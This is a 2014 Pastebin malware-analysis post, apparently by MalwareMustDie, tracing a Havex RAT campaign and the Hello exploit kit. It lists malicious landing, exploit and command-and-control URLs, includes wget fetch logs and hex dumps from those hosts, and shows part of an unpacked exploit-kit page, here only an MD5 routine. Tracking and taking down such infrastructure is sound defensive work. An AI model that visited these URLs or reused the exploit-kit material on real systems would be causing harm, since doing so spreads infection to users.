Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie! @unixfreaxjp
- // Is a day off today, I gotta go, so is a half way work,
- // To do TASK to our "crusaders":
- // 1. Takedown all of the url stated below
- // 2. Continue to PoC the payload fetch, the exploit urls are all extracted clearly now.
- // Base on report from Gi0vann1 @Sug4r:)) (with thx & #w00t!): http://pastebin.com/2x1JinJd
- // also thx to @shibumi for the comm! thx also to @node5 for recognizing LightsOut/Hello EK
- // thx for the Set's database to compare the HelloEK's details.
- /* The malware is Havex Rat, Bad stuff. ref: http://www.businessinsider.com/countries-targeted-by-russia-hack-2014-1
- suspecting is watering scheme for wide range of hits.. */
- // Exploitation Verdict Analysis
- EK:
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php // Landing page EK
- EK Details (HelloEK):
- // Infection Checker:
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php
- // Landing Page PD
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h1&f=51d0f9f5d6d2c5ff3ade4b38bb7c1ceb&u=Mozilla%2F5.0%20(Windows%3B%20U%3B%20MSIE%207.0%3B%20Windows%20NT%205.2)%20Java%2F1.5.0_08
- // Exploit:
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h2 Non IE Java <= 1.7.17
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h3 IE 7 Java <= 1.7.17
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h4 IE 6 Win < 6
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h5 IE 7 Win/NT < 6 Java <= 1.7.17
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h6 IE 8 Win < 6
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h7 Non IE Java <= 1.6.32
- // HAVEX CNC CHECKED:
- h00p://pekanin.freevar.com/include/template/isx.php // (null)
- h00p://simpsons.freesexycomics.com/wp06/wp-includes/po.php // (encoded CNC hexcode)
- h00p://toons.freesexycomics.com/wp08/wp-includes/dtcla.php // (encoded CNC hexcode)
- h00p://www.pc-service-fm.de/modules/mod_search/src.php // <!--havexhavex-->
- h00p://artem.sataev.com/blog/wp-includes/pomo/src.php // 404
- h00p://swissitaly.com/includes/phpmailer/class.pop3.php // 404
- // Chapter:
- // Follow up details
- // Exploit Kit part
- //
- // =================
- // Follow up details:
- // =================
- // FIRST URL ONLY...
- --- fetch header ----
- Date: 2014-03-11 09:25:15
- URL: http://pekanin.freevar.com/include/template/isx.php
- Resolving pekanin.freevar.com (pekanin.freevar.com)... 5.9.82.27
- Caching pekanin.freevar.com => 5.9.82.27
- Connecting to pekanin.freevar.com (pekanin.freevar.com)|5.9.82.27|:80... connected.
- ---request begin---
- GET /include/template/isx.php HTTP/1.1
- Referer: http://www.google.com
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: pekanin.freevar.com
- Connection: Keep-Alive
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 300
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Date: Tue, 11 Mar 2014 00:25:16 GMT
- Server: Apache
- X-Powered-By: PHP/5.4.17
- Cache-Control: no-cache
- Keep-Alive: timeout=1, max=10000
- Connection: Keep-Alive
- Transfer-Encoding: chunked
- Content-Type: text/html
- Saving to: 'isx.php'
- 2014-03-11 09:25:17 (5.27 MB/s) - 'isx.php' saved [723]
- $ date
- Tue Mar 11 09:29:14 JST 2014
- $
- $ cat isx.php
- <html><head><mega http-equiv='CACHE-CONTROL' content='NO-CACHE'></head><body>No data!<!--havexhavex-->
- <!-- Free Web Hosting Area Start -->
- <script type="text/javascript" src="http://user99.freewebhostingarea.com/a/gfreeh.js"></script>
- <script type="text/javascript" src="http://user99.freewebhostingarea.com/a/in300.js"></script>
- <script type="text/javascript" src="http://user99.freewebhostingarea.com/a/specoff.js"></script>
- <noscript><br><center><font color='#000000' face='Verdana' style='font-size: 11px; background-color:#FFFFFF'><a target='_blank' href='http://www.freewebhostingarea.com'><font color='#000000'>Free Web Hosting</font></a></font></center></noscript>
- <!-- Free Web Hosting Area End -->
- </body></head>$
- $ date
- Tue Mar 11 09:29:46 JST 2014
- $ wget -nv http://user99.freewebhostingarea.com/a/gfreeh.js
- 2014-03-11 09:29:56 URL:http://user99.freewebhostingarea.com/a/gfreeh.js [935/935] -> "gfreeh.js" [1]
- $ wget -nv http://user99.freewebhostingarea.com/a/in300.js
- 2014-03-11 09:30:15 URL:http://user99.freewebhostingarea.com/a/in300.js [935/935] -> "in300.js" [1]
- $ wget -nv http://user99.freewebhostingarea.com/a/specoff.js
- 2014-03-11 09:30:33 URL:http://user99.freewebhostingarea.com/a/specoff.js [935/935] -> "specoff.js" [1]
- $
- $ date
- Tue Mar 11 09:30:38 JST 2014
- $
- $ cat gfreeh.js
- var m3_u = (location.protocol=='https:'?'https://user99.freewebhostingarea.com/po/www/delivery/ajs.php':'http://user99.freewebhostingarea.com/po/www/delivery/ajs.php');
- var m3_r = Math.floor(Math.random()*99999999999);
- if (!document.MAX_used) document.MAX_used = ',';
- document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
- document.write ("?zoneid=3");
- document.write ('&cb=' + m3_r);
- if (document.MAX_used != ',') document.write ("&exclude=" + document.MAX_used);
- document.write (document.charset ? '&charset='+document.charset : (document.characterSet ? '&charset='+document.characterSet : ''));
- document.write ("&loc=" + escape(window.location));
- if (document.referrer) document.write ("&referer=" + escape(document.referrer));
- if (document.context) document.write ("&context=" + escape(document.context));
- if (document.mmm_fo) document.write ("&mmm_fo=1");
- document.write ("'><\/scr"+"ipt>");
- $
- $
- $
- $ cat in300.js
- var m3_u = (location.protocol=='https:'?'https://user99.freewebhostingarea.com/po/www/delivery/ajs.php':'http://user99.freewebhostingarea.com/po/www/delivery/ajs.php');
- var m3_r = Math.floor(Math.random()*99999999999);
- if (!document.MAX_used) document.MAX_used = ',';
- document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
- document.write ("?zoneid=12");
- document.write ('&cb=' + m3_r);
- if (document.MAX_used != ',') document.write ("&exclude=" + document.MAX_used);
- document.write (document.charset ? '&charset='+document.charset : (document.characterSet ? '&charset='+document.characterSet : ''));
- document.write ("&loc=" + escape(window.location));
- if (document.referrer) document.write ("&referer=" + escape(document.referrer));
- if (document.context) document.write ("&context=" + escape(document.context));
- if (document.mmm_fo) document.write ("&mmm_fo=1");
- document.write ("'><\/scr"+"ipt>");$
- $
- $
- $
- $ cat specoff.js
- var m3_u = (location.protocol=='https:'?'https://user99.freewebhostingarea.com/po/www/delivery/ajs.php':'http://user99.freewebhostingarea.com/po/www/delivery/ajs.php');
- var m3_r = Math.floor(Math.random()*99999999999);
- if (!document.MAX_used) document.MAX_used = ',';
- document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
- document.write ("?zoneid=10");
- document.write ('&cb=' + m3_r);
- if (document.MAX_used != ',') document.write ("&exclude=" + document.MAX_used);
- document.write (document.charset ? '&charset='+document.charset : (document.characterSet ? '&charset='+document.characterSet : ''));
- document.write ("&loc=" + escape(window.location));
- if (document.referrer) document.write ("&referer=" + escape(document.referrer));
- if (document.context) document.write ("&context=" + escape(document.context));
- if (document.mmm_fo) document.write ("&mmm_fo=1");
- document.write ("'><\/scr"+"ipt>");$
- $
- // Target
- -- Fetch header --
- Date: 2014-03-11 09:37:24
- URL: http://user99.freewebhostingarea.com/po/www/delivery/ajs.php
- Resolving user99.freewebhostingarea.com (user99.freewebhostingarea.com)... 64.31.54.149
- Caching user99.freewebhostingarea.com => 64.31.54.149
- Connecting to user99.freewebhostingarea.com (user99.freewebhostingarea.com)|64.31.54.149|:80... connected.
- ---request begin---
- GET /po/www/delivery/ajs.php HTTP/1.1
- Referer: http://www.google.com
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: user99.freewebhostingarea.com
- Connection: Keep-Alive
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 300
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Date: Tue, 11 Mar 2014 00:37:25 GMT
- Server: Apache
- X-Powered-By: PHP/5.3.27
- Pragma: no-cache
- Cache-Control: private, max-age=0, no-cache
- Expires: Mon, 26 Jul 1997 05:00:00 GMT
- P3P: CP="CUR ADM OUR NOR STA NID"
- Set-Cookie: OAGEO=JP%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
- Set-Cookie: OAID=cb77d5dfd349d4c0a5c28a208693a25d; expires=Wed, 11-Mar-2015 00:37:25 GMT; path=/
- Content-Length: 52
- Keep-Alive: timeout=1, max=10000
- Connection: Keep-Alive
- Content-Type: text/javascript; charset=UTF-8
- 200 OK
- Stored cookie user99.freewebhostingarea.com -1 (ANY) / <session> <insecure> [expiry none] OAGEO JP%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C
- Stored cookie user99.freewebhostingarea.com -1 (ANY) / <permanent> <insecure> [expiry 2015-03-11 09:37:25] OAID cb77d5dfd349d4c0a5c28a208693a25d
- URI content encoding = 'UTF-8'
- Length: 52 [text/javascript]
- Saving to: 'ajs.php'
- 2014-03-11 09:37:25 (1.01 MB/s) - 'ajs.php' saved [52/52]
- // Details:
- $
- $ date
- Tue Mar 11 09:40:22 JST 2014
- $
- $ cat ajs.php
- var OX_031eb7b0 = '';
- document.write(OX_031eb7b0);
- $
- // This should lead to a (new) null CVE??? #lol :-)
- // SECOND URL ONLY..
- -- Fetch Header --
- Date: 2014-03-11 09:44:26
- URL: http://simpsons.freesexycomics.com/wp06/wp-includes/po.php
- Resolving simpsons.freesexycomics.com (simpsons.freesexycomics.com)... 198.63.208.206
- Caching simpsons.freesexycomics.com => 198.63.208.206
- Connecting to simpsons.freesexycomics.com (simpsons.freesexycomics.com)|198.63.208.206|:80... connected.
- ---request begin---
- GET /wp06/wp-includes/po.php HTTP/1.1
- Referer: http://www.google.com
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: simpsons.freesexycomics.com
- Connection: Keep-Alive
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 300
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Date: Tue, 11 Mar 2014 00:44:26 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: keep-alive
- Server: Apache/1.3.37 (Unix)
- Cache-Control: no-cache
- Content-Encoding: gzip
- 200 OK
- Saving to: 'po.php'
- 2014-03-11 09:44:27 (468 KB/s) - 'po.php' saved [147]
- // insides..
- $ date
- Tue Mar 11 09:45:49 JST 2014
- $
- $$
- $ less po.php
- "po.php" may be a binary file. See it anyway?
- ^_<8B>^H^@^@^@^@^@^@^C%<CE>A
- <C2>0^P^E<D0><AB><8C><AB>l^\<BD>@^Z<90> <B8><90>^F<D4>^KD34^E<9B><B4><D3>i1<B7>7<D6><CD>l<FE><FF><8F><D1>Q<86><B7><D1><91>|0z<A0><CE>C^T^Y<91><A6><A5>_ESCeO
- <F6>rF<EB><DA><C7><CD>]^U<BC>r^RJ<D2><A8><D6><E1>^V)<A3><8F><FF><E9>3<87>b<EE><99><B9><EC>!^|<AD>3<D3><<E6>^T<FA><D4>A<C9>^K^CW<98>f9<E8>^]b<F4>+}<B6><83>X
- <9D>M<A8><DC><EF><9F>/<83>m!<C8><96>^@^@^@
- $
- $
- $ bincat po.php
- 0000 1F 8B 08 00 00 00 00 00 00 03 25 CE 41 0A C2 30 ..........%.A..0
- 0010 10 05 D0 AB 8C AB 6C 1C BD 40 1A 90 20 B8 90 06 ......l..@.. ...
- 0020 D4 0B 44 33 34 05 9B B4 D3 69 31 B7 37 D6 CD 6C ..D34....i1.7..l
- 0030 FE FF 8F D1 51 86 B7 D1 91 7C 30 7A A0 CE 43 14 ....Q....|0z..C.
- 0040 19 91 A6 A5 5F 1B 65 4F F6 72 46 EB DA C7 CD 5D ...._.eO.rF....]
- 0050 15 BC 72 12 4A D2 A8 D6 E1 16 29 A3 8F FF E9 33 ..r.J.....)....3
- 0060 87 62 EE 99 B9 EC 21 65 08 5E 7C AD 33 D3 3C E6 .b....!e.^|.3.<.
- 0070 14 FA D4 41 C9 0B 03 57 98 66 39 E8 1D 62 F4 2B ...A...W.f9..b.+
- 0080 7D B6 83 58 9D 4D A8 DC EF 9F 2F 83 6D 21 C8 96 }..X.M..../.m!..
- 0090 00 00 00 ...
- // encoded globs. No sample, can not do much yet, hang on...
- // THIRD URL..
- http://toons.freesexycomics.com/wp08/wp-includes/dtcla.php
- $ date
- Tue Mar 11 09:51:55 JST 2014
- $
- ---Fetch header---
- Date: 2014-03-11 09:52:11
- URL: http://toons.freesexycomics.com/wp08/wp-includes/dtcla.php
- Resolving toons.freesexycomics.com (toons.freesexycomics.com)... 198.63.208.206
- Caching toons.freesexycomics.com => 198.63.208.206
- Connecting to toons.freesexycomics.com (toons.freesexycomics.com)|198.63.208.206|:80... connected.
- ---request begin---
- GET /wp08/wp-includes/dtcla.php HTTP/1.1
- Referer: http://www.google.com
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: toons.freesexycomics.com
- Connection: Keep-Alive
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 300
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Date: Tue, 11 Mar 2014 00:52:12 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: keep-alive
- Server: Apache/1.3.37 (Unix)
- Cache-Control: no-cache
- Content-Encoding: gzip
- 200 OK
- Length: unspecified [text/html]
- Saving to: 'dtcla.php'
- 2014-03-11 09:52:12 (470 KB/s) - 'dtcla.php' saved [147]
- $ date
- Tue Mar 11 09:54:14 JST 2014
- $ less dtcla.php
- "dtcla.php" may be a binary file. See it anyway?
- ^_<8B>^H^@^@^@^@^@^@^C%<CE>A
- <C2>0^P^E<D0><AB><8C><AB>l^\<BD>@^Z<90> <B8><90>^F<D4>^KD34^E<9B><B4><D3>i1<B7>7<D6><CD>l<FE><FF><8F><D1>Q<86><B7><D1><91>|0z<A0><CE>C^T^Y<91><A6><A5>_ESCeO
- <F6>rF<EB><DA><C7><CD>]^U<BC>r^RJ<D2><A8><D6><E1>^V)<A3><8F><FF><E9>3<87>b<EE><99><B9><EC>!^|<AD>3<D3><<E6>^T<FA><D4>A<C9>^K^CW<98>f9<E8>^]b<F4>+}<B6><83>X
- <9D>M<A8><DC><EF><9F>/<83>m!<C8><96>^@^@^@
- $
- $ bincat dtcla.php
- 0000 1F 8B 08 00 00 00 00 00 00 03 25 CE 41 0A C2 30 ..........%.A..0
- 0010 10 05 D0 AB 8C AB 6C 1C BD 40 1A 90 20 B8 90 06 ......l..@.. ...
- 0020 D4 0B 44 33 34 05 9B B4 D3 69 31 B7 37 D6 CD 6C ..D34....i1.7..l
- 0030 FE FF 8F D1 51 86 B7 D1 91 7C 30 7A A0 CE 43 14 ....Q....|0z..C.
- 0040 19 91 A6 A5 5F 1B 65 4F F6 72 46 EB DA C7 CD 5D ...._.eO.rF....]
- 0050 15 BC 72 12 4A D2 A8 D6 E1 16 29 A3 8F FF E9 33 ..r.J.....)....3
- 0060 87 62 EE 99 B9 EC 21 65 08 5E 7C AD 33 D3 3C E6 .b....!e.^|.3.<.
- 0070 14 FA D4 41 C9 0B 03 57 98 66 39 E8 1D 62 F4 2B ...A...W.f9..b.+
- 0080 7D B6 83 58 9D 4D A8 DC EF 9F 2F 83 6D 21 C8 96 }..X.M..../.m!..
- 0090 00 00 00 ...
- // Exactly same CVE as previous one..
- $ date
- Tue Mar 11 09:56:11 JST 2014
- $
- $ vt check dtcla.php |less
- -----------------------------------------------------------
- VT-shell 1.1 FreeBSD version - by @unixfreaxjp
- Usage is: /usr/local/bin/vt COMMAND(check | scan) and PATH(a correct full-path-to-sample)
- -----------------------------------------------------------
- Sample : dtcla.php
- MD5 : 2d43b8539ee3aff06feab586191dc2a1
- SHA256 : 37dedc60b1fbdf89160c7cb9258f87162725103fecf8b4b1d6b538ae7e4ec7fe
- URL : https://www.virustotal.com/latest-scan/37dedc60b1fbdf89160c7cb9258f87162725103fecf8b4b1d6b538ae7e4ec7fe
- -----------------------------------------------------------
- VirusTotal
- File not found
- $
- $
- // I feel weird...Uploading this now..
- // uploaded this to the VT here:
- // https://www.virustotal.com/en/file/37dedc60b1fbdf89160c7cb9258f87162725103fecf8b4b1d6b538ae7e4ec7fe/analysis/1394499588/
- // FORTH URL:
- http://www.pc-service-fm.de/modules/mod_search/src.php
- $ date
- Tue Mar 11 10:08:23 JST 2014
- $
- -- Fetch header ---
- Date: 2014-03-11 10:08:38
- URL: http://www.pc-service-fm.de/modules/mod_search/src.php
- Resolving www.pc-service-fm.de (www.pc-service-fm.de)... 81.169.145.163
- Caching www.pc-service-fm.de => 81.169.145.163
- Connecting to www.pc-service-fm.de (www.pc-service-fm.de)|81.169.145.163|:80... connected.
- ---request begin---
- GET /modules/mod_search/src.php HTTP/1.1
- Referer: http://www.google.com
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: www.pc-service-fm.de
- Connection: Keep-Alive
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 300
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Date: Tue, 11 Mar 2014 01:08:44 GMT
- Server: Apache/2.2.26 (Unix)
- X-Powered-By: PHP/5.3.28
- Cache-Control: no-cache
- Keep-Alive: timeout=3, max=100
- Connection: Keep-Alive
- Transfer-Encoding: chunked
- Content-Type: text/html
- 200 OK
- Length: unspecified [text/html]
- Saving to: 'src.php'
- 2014-03-11 10:08:45 (1.23 MB/s) - 'src.php' saved [150]
- $ date
- Tue Mar 11 10:10:25 JST 2014
- $
- $ cat src.php
- <html><head><mega http-equiv='CACHE-CONTROL' content='NO-CACHE'></head><body>Sorry, no data corresponding your request.<!--havexhavex--></body></html>$
- $
- // WE GOT THE VERDICT..
- //this is a positive PoC of HAVEX-RAT CNC
- // FIFTH URL..
- http://artem.sataev.com/blog/wp-includes/pomo/src.php
- 2014-03-11 10:16:15 ERROR 404: Not Found.
- // SIXTH URL:
- http://swissitaly.com/includes/phpmailer/class.pop3.php
- 2014-03-11 10:19:59 ERROR 404: Not Found.
- // ==============================
- // JOURNEY TO THE EXPLOIT KIT...
- // Say hello to series of jars via
- // Old friend PluginDetect.
- // ==============================
- // SEVENTH URL..
- http://mahsms.ir/wp-includes/pomo/dtsrc.php
- // THis is a kind of ticket to the landing page...
- // We'll see...
- -- Fetch header --
- Date: 2014-03-11 10:22:04--
- URL: http://mahsms.ir/wp-includes/pomo/dtsrc.php
- Resolving mahsms.ir (mahsms.ir)... 176.9.92.69
- Caching mahsms.ir => 176.9.92.69
- Connecting to mahsms.ir (mahsms.ir)|176.9.92.69|:80... connected.
- ---request begin---
- GET /wp-includes/pomo/dtsrc.php HTTP/1.1
- Referer: http://www.google.com
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: mahsms.ir
- Connection: Keep-Alive
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 300
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Content-Encoding: gzip
- Vary: Accept-Encoding
- Date: Tue, 11 Mar 2014 01:22:06 GMT
- Server: LiteSpeed
- Connection: close
- X-Powered-By: PHP/5.2.17
- Content-Type: text/html
- Content-Length: 8115
- 200 OK
- Length: 8115 (7.9K) [text/html]
- Saving to: 'dtsrc.php'
- 2014-03-11 10:22:06 (3.37 MB/s) - 'dtsrc.php' saved [8115/8115]
- $
- $ date && less dtsrc.php
- Tue Mar 11 10:24:00 JST 2014
- "dtsrc.php" may be a binary file. See it anyway?
- ^_<8B>^H^@^@^@^@^@^D^C<95>\<FD>rESC<B9><91><FF>^?<AB>
- [...]
- <F1><87>W<F2>^V&<C0><BE><98><FF><89><B5>^_<FF>^O<8F>\F~<8C>M^@^@
- $
- $ bincat dtsrc.php
- 0000 1F 8B 08 00 00 00 00 00 04 03 95 5C FD 72 1B B9 .............r..
- 0010 91 FF 7F AB F6 1D E6 54 75 2B EA 6C C9 1C 7E 73 .......Tu+.l..~s
- 0020 B3 DE 94 44 7D DA 92 AC 13 29 3B 1B 67 73 05 92 ...D}....);.gs..
- 0030 20 39 E6 70 86 3B 1F 12 E9 75 F2 06 F7 20 79 81 9.p.;...u... y.
- 0040 7B 81 D4 BD D7 FD BA 1B C0 0C 29 AE 37 A7 4A 96 {.........).7.J.
- 0050 00 A6 D1 D3 68 F4 37 30 FE 61 96 2D 42 6F B5 08 ....h.70.a.-Bo..
- [...]
- 1F20 A7 94 06 3E 46 DD 55 D1 57 47 F6 AB 15 42 ED 95 ...>F.U.WG...B..
- 1F30 D5 E8 37 10 57 F6 68 22 6C 89 9D E8 88 FA E1 55 ..7.W.h"l......U
- 1F40 CA 59 18 FD 33 66 AF 66 E6 DF 33 A3 2F DE 68 E0 .Y..3f.f..3./.h.
- 1F50 DD C9 9B B3 DE C0 0B C6 AF 4B DF BB 78 BD EB E3 .........K..x...
- 1F60 7E FF EA F4 F5 DE 08 17 6F C6 DF E3 DF 8A A9 4E ~.......o......N
- 1F70 F0 EF 81 1D 76 3B C3 E6 A1 EF 8F 26 87 C3 61 A7 ....v;.....&..a.
- 1F80 76 58 AD 2A 55 AD 0E C7 23 5D 1D EE 79 2C C9 AF vX.*U...#]..y,..
- 1F90 F7 AA CB D5 1E BE 33 A5 6B 29 D2 F9 F1 87 57 F2 ......3.k)....W.
- 1FA0 16 26 C0 BE 98 FF 89 B5 1F FF 0F 8F 5C 46 7E 8C .&...........F~.
- 1FB0 4D 00 00 M..
- // Seeing the bits is the gunzip format. Unwrapped and see it..
- $ date
- Tue Mar 11 10:33:27 JST 2014
- $
- $ cp dtsrc.php dtsrc.gz
- $ gunzip dtsrc.gz
- $
- $ ls dtsrc*
- dtsrc dtsrc.php
- $
- $ bincat dtsrc
- 0000 3C 68 74 6D 6C 20 78 6D 6C 6E 73 3D 22 68 74 74 <html xmlns="htt
- 0010 70 3A 2F 2F 77 77 77 2E 77 33 2E 6F 72 67 2F 31 p://www.w3.org/1
- 0020 39 39 39 2F 68 74 6D 6C 22 3E 0D 0A 3C 68 65 61 999/html">..<hea
- 0030 64 3E 0D 0A 3C 73 63 72 69 70 74 20 74 79 70 65 d>..<script type
- 0040 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 ="text/javascrip
- 0050 74 22 3E 0D 0A 66 75 6E 63 74 69 6F 6E 20 6D 64 t">..function md
- 0060 35 63 79 63 6C 65 28 78 2C 20 6B 29 20 7B 0D 0A 5cycle(x, k) {..
- [..]
- // in text... Just another redirector boobytraps...a ticket..
- // w/ CVE-2013-2882.. the fuzzy in font-names..
- <html xmlns="http://www.w3.org/1999/html">
- <head>
- <script type="text/javascript">
- function md5cycle(x, k) {
- var a = x[0], b = x[1], c = x[2], d = x[3];
- a = ff(a, b, c, d, k[0], 7, -680876936);
- d = ff(d, a, b, c, k[1], 12, -389564586);
- c = ff(c, d, a, b, k[2], 17, 606105819);
- b = ff(b, c, d, a, k[3], 22, -1044525330);
- a = ff(a, b, c, d, k[4], 7, -176418897);
- d = ff(d, a, b, c, k[5], 12, 1200080426);
- c = ff(c, d, a, b, k[6], 17, -1473231341);
- b = ff(b, c, d, a, k[7], 22, -45705983);
- a = ff(a, b, c, d, k[8], 7, 1770035416);
- d = ff(d, a, b, c, k[9], 12, -1958414417);
- c = ff(c, d, a, b, k[10], 17, -42063);
- b = ff(b, c, d, a, k[11], 22, -1990404162);
- a = ff(a, b, c, d, k[12], 7, 1804603682);
- d = ff(d, a, b, c, k[13], 12, -40341101);
- c = ff(c, d, a, b, k[14], 17, -1502002290);
- b = ff(b, c, d, a, k[15], 22, 1236535329);
- a = gg(a, b, c, d, k[1], 5, -165796510);
- d = gg(d, a, b, c, k[6], 9, -1069501632);
- c = gg(c, d, a, b, k[11], 14, 643717713);
- b = gg(b, c, d, a, k[0], 20, -373897302);
- a = gg(a, b, c, d, k[5], 5, -701558691);
- d = gg(d, a, b, c, k[10], 9, 38016083);
- c = gg(c, d, a, b, k[15], 14, -660478335);
- b = gg(b, c, d, a, k[4], 20, -405537848);
- a = gg(a, b, c, d, k[9], 5, 568446438);
- d = gg(d, a, b, c, k[14], 9, -1019803690);
- c = gg(c, d, a, b, k[3], 14, -187363961);
- b = gg(b, c, d, a, k[8], 20, 1163531501);
- a = gg(a, b, c, d, k[13], 5, -1444681467);
- d = gg(d, a, b, c, k[2], 9, -51403784);
- c = gg(c, d, a, b, k[7], 14, 1735328473);
- b = gg(b, c, d, a, k[12], 20, -1926607734);
- a = hh(a, b, c, d, k[5], 4, -378558);
- d = hh(d, a, b, c, k[8], 11, -2022574463);
- c = hh(c, d, a, b, k[11], 16, 1839030562);
- b = hh(b, c, d, a, k[14], 23, -35309556);
- a = hh(a, b, c, d, k[1], 4, -1530992060);
- d = hh(d, a, b, c, k[4], 11, 1272893353);
- c = hh(c, d, a, b, k[7], 16, -155497632);
- b = hh(b, c, d, a, k[10], 23, -1094730640);
- a = hh(a, b, c, d, k[13], 4, 681279174);
- d = hh(d, a, b, c, k[0], 11, -358537222);
- c = hh(c, d, a, b, k[3], 16, -722521979);
- b = hh(b, c, d, a, k[6], 23, 76029189);
- a = hh(a, b, c, d, k[9], 4, -640364487);
- d = hh(d, a, b, c, k[12], 11, -421815835);
- c = hh(c, d, a, b, k[15], 16, 530742520);
- b = hh(b, c, d, a, k[2], 23, -995338651);
- a = ii(a, b, c, d, k[0], 6, -198630844);
- d = ii(d, a, b, c, k[7], 10, 1126891415);
- c = ii(c, d, a, b, k[14], 15, -1416354905);
- b = ii(b, c, d, a, k[5], 21, -57434055);
- a = ii(a, b, c, d, k[12], 6, 1700485571);
- d = ii(d, a, b, c, k[3], 10, -1894986606);
- c = ii(c, d, a, b, k[10], 15, -1051523);
- b = ii(b, c, d, a, k[1], 21, -2054922799);
- a = ii(a, b, c, d, k[8], 6, 1873313359);
- d = ii(d, a, b, c, k[15], 10, -30611744);
- c = ii(c, d, a, b, k[6], 15, -1560198380);
- b = ii(b, c, d, a, k[13], 21, 1309151649);
- a = ii(a, b, c, d, k[4], 6, -145523070);
- d = ii(d, a, b, c, k[11], 10, -1120210379);
- c = ii(c, d, a, b, k[2], 15, 718787259);
- b = ii(b, c, d, a, k[9], 21, -343485551);
- x[0] = add32(a, x[0]);
- x[1] = add32(b, x[1]);
- x[2] = add32(c, x[2]);
- x[3] = add32(d, x[3]);
- }
- function cmn(q, a, b, x, s, t) {
- a = add32(add32(a, q), add32(x, t));
- return add32((a << s) | (a >>> (32 - s)), b);
- }
- function ff(a, b, c, d, x, s, t) {
- return cmn((b & c) | ((~b) & d), a, b, x, s, t);
- }
- function gg(a, b, c, d, x, s, t) {
- return cmn((b & d) | (c & (~d)), a, b, x, s, t);
- }
- function hh(a, b, c, d, x, s, t) {
- return cmn(b ^ c ^ d, a, b, x, s, t);
- }
- function ii(a, b, c, d, x, s, t) {
- return cmn(c ^ (b | (~d)), a, b, x, s, t);
- }
- function md51(s) {
- var n = s.length,
- state = [1732584193, -271733879, -1732584194, 271733878], i;
- for (i = 64; i <= s.length; i += 64) {
- md5cycle(state, md5blk(s.substring(i - 64, i)));
- }
- s = s.substring(i - 64);
- var tail = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
- for (i = 0; i < s.length; i++)
- tail[i >> 2] |= s.charCodeAt(i) << ((i % 4) << 3);
- tail[i >> 2] |= 0x80 << ((i % 4) << 3);
- if (i > 55) {
- md5cycle(state, tail);
- for (i = 0; i < 16; i++) tail[i] = 0;
- }
- tail[14] = n * 8;
- md5cycle(state, tail);
- return state;
- }
- function md5blk(s) {
- var md5blks = [], i;
- for (i = 0; i < 64; i += 4) {
- md5blks[i >> 2] = s.charCodeAt(i)
- + (s.charCodeAt(i + 1) << 8)
- + (s.charCodeAt(i + 2) << 16)
- + (s.charCodeAt(i + 3) << 24);
- }
- return md5blks;
- }
